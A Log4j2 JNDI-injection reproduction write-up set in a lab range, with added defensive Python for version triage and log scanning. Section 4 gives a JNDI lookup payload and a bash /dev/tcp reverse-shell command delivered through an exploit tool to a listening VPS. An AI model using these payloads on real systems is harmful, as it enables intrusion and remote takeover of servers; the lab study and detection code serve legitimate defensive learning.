[vulnerability recurrence] Apache log4j2 Remote Code Execution Vulnerability
2022-07-21 08:45:00 【H-neck white cap】
Statement
This article is intended only for technical research and vulnerability-reproduction study. Do not use the attack methods described here in unauthorized field tests; any consequences have nothing to do with this article or its author!
1. Product overview
Apache Log4j2 is a Java-based logging tool. It is a rewrite of the Log4j framework that introduces many rich features. The logging framework is widely used in business system development to record log information.
2. Vulnerability summary
Because the Log4j2 component has a JNDI injection flaw when processing application log messages, an unauthenticated attacker can exploit this vulnerability by sending carefully constructed malicious data to the target server. This triggers the Log4j2 component's lookup-resolution defect, achieves arbitrary code execution on the target server, and yields control of the target server.
3. Affected scope
Apache Log4j2 2.0-beta9 through 2.15.0
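As an added example (not part of the original article), the following Python helper checks whether a Log4j2 version string falls inside the affected range stated above (2.0-beta9 through 2.15.0, inclusive) and applies that check to a constructed list of jar file names, which is how a defender would triage an application's classpath. The pre-release ordering rule (alpha < beta < rc < final release) and the `log4j-core-<version>.jar` name pattern are assumptions of this example.

```python
import re
from typing import Dict, Iterable, Tuple

# Affected range exactly as stated in this article (inclusive on both ends).
AFFECTED_LOW = "2.0-beta9"
AFFECTED_HIGH = "2.15.0"

# Assumption of this example: pre-release tags sort before the final release
# of the same version number, in the order alpha < beta < rc < final.
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL_RANK = 3

_VERSION_RE = re.compile(
    r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE
)


def version_key(version: str) -> Tuple[int, int, int, int, int]:
    """Map a version string such as '2.0-beta9' or '2.15.0' to a sortable tuple."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, tag, num = m.groups()
    pre_rank = _PRE_RANK[tag.lower()] if tag else _FINAL_RANK
    pre_num = int(num) if num else 0
    return (int(major), int(minor or 0), int(patch or 0), pre_rank, pre_num)


def is_affected(version: str) -> bool:
    """True when the version lies inside the affected range from the article."""
    return version_key(AFFECTED_LOW) <= version_key(version) <= version_key(AFFECTED_HIGH)


# Assumption of this example: the core jar is named log4j-core-<version>.jar.
_JAR_RE = re.compile(r"log4j-core-([0-9][0-9A-Za-z.\-]*)\.jar$")


def scan_jar_names(jar_names: Iterable[str]) -> Dict[str, bool]:
    """Return {jar_name: affected?} for every log4j-core jar found in the list."""
    result = {}
    for name in jar_names:
        m = _JAR_RE.search(name)
        if m:
            result[name] = is_affected(m.group(1))
    return result


# Constructed sample classpath for demonstration; these are not real findings.
SAMPLE_CLASSPATH = [
    "lib/log4j-api-2.14.1.jar",
    "lib/log4j-core-2.14.1.jar",
    "lib/log4j-core-2.0-beta9.jar",
    "lib/log4j-core-2.17.1.jar",
    "lib/commons-lang3-3.12.0.jar",
]

if __name__ == "__main__":
    for jar, affected in scan_jar_names(SAMPLE_CLASSPATH).items():
        print(f"{jar}: {'AFFECTED' if affected else 'ok'}")
```

The jar scan deliberately ignores `log4j-api`, since the lookup-resolution defect lives in `log4j-core`; a real inventory would also unpack fat jars and read `META-INF/MANIFEST.MF`, which this example does not do.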
4. Vulnerability reproduction
Tested with the vulfocus range environment.
Open the range interface.
Capture the request with Burp and test directly with the payload, then check whether dnslog shows a callback. payload: ${jndi:ldap://X.X.X.X/TomcatBypass/TomcatEcho}
The dnslog platform shows data. Since there is a callback, go straight to a practical reverse shell.
Tool used next: JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar (downloaded from GitHub).
For the reverse shell, the first thought is to use bash -i >& /dev/tcp/X.X.X.X/X 0>&1
, but it cannot be used directly here: the payload needs to be base64-encoded and then executed with a bash command.
Recommended encoding site: https://www.bugku.net/runtime-exec-payloads/
Enter the bash reverse-shell command above to get the encoded payload.
Apply this bash command directly in the JNDIExploit tool; the interface after execution is as follows:
Here the JNDI link is selected according to the payload for the current experimental environment.
Create a listener on the VPS.
Back in Burp, test directly with the payload. Remember to URL-encode the payload, because this is a GET request; the conversion can be done directly in Burp's Decoder module.
Put the encoded payload in Repeater and send it.
The VPS shows a lot of echoed data; looking at the listening port, the shell has been received successfully.
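From the defender's side, the request the walkthrough sends is exactly what a detection rule on the web tier needs to catch. The following Python snippet is added here and is not part of the original article or of any tool it mentions: it scans constructed access-log lines for a JNDI lookup string, URL-decoding each line first because, as noted above, the payload is URL-encoded when sent in a GET request (it decodes up to three times to also handle a double-encoded request). The log lines, IP addresses (documentation range 192.0.2.0/24) and the result field names are constructed for this example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Matches ${jndi:<scheme>://<host>...}; captures the scheme and the callback host.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/*([^/:}\s]+)", re.IGNORECASE)


def normalize(line: str) -> str:
    """URL-decode repeatedly (max 3 rounds) until the text stops changing,
    so that a payload sent URL-encoded in a GET request is seen in plain form."""
    prev, cur = None, line
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def find_jndi_lookup(line: str) -> Optional[Dict[str, object]]:
    """Return {'scheme': ..., 'host': ...} if the line carries a JNDI lookup, else None."""
    m = JNDI_RE.search(normalize(line))
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2)}


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan access-log lines and return one hit per line that contains a lookup,
    tagged with its 1-based line number so an analyst can pivot back to the log."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = find_jndi_lookup(line)
        if hit:
            hit["line"] = n
            hits.append(hit)
    return hits


# Constructed sample access log (combined log format); line 1 is URL-encoded
# as it would be after the Burp Decoder step, line 3 is the same lookup in plain form.
LOG_LINES = [
    '192.0.2.5 - - [21/Jul/2022:08:45:00 +0800] "GET /hello?name=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A1389%2FTomcatBypass%2FTomcatEcho%7D HTTP/1.1" 200 12',
    '192.0.2.6 - - [21/Jul/2022:08:45:01 +0800] "GET /index.html HTTP/1.1" 200 1024',
    '192.0.2.7 - - [21/Jul/2022:08:45:02 +0800] "GET /hello?name=${jndi:ldap://192.0.2.10:1389/a} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(LOG_LINES):
        print(f"line {hit['line']}: jndi lookup via {hit['scheme']} to {hit['host']}")
```

The callback host captured in each hit is the value to feed into egress blocking and alert correlation; note that an access log only records what reached the web server, so the same rule should also run over application logs, where the string is actually evaluated by Log4j2.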
5. Remediation
Update to the latest official version!
6. References
https://nosec.org/home/detail/4920.html